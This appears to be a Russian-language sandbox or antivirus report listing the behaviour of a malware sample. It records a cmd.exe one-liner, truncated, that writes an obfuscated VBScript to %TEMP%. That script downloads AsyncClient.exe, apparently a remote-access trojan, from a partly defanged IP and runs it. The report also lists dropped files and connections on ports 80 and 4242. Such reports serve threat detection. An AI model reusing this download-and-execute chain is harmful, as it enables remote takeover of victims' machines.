Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "http://18#.#47.138.212/AsyncClient.exe">> U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"))>> U0k.VBS &@ECHO D8t.Open J...
- %TEMP%\u0k.vbs
- %TEMP%\oc.exe
- %TEMP%\u0k.vbs
- '18#.#47.138.212':80
- '18#.#47.138.212':4242
- '18#.#47.138.212':4242
- '<SYSTEM32>\wscript.exe' "%TEMP%\U0k.VBS"
- '%TEMP%\oc.exe'
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "http://18#.#47.138.212/AsyncClient.exe">> U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"))>> U0k.VBS &@ECHO D8t.Open J...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13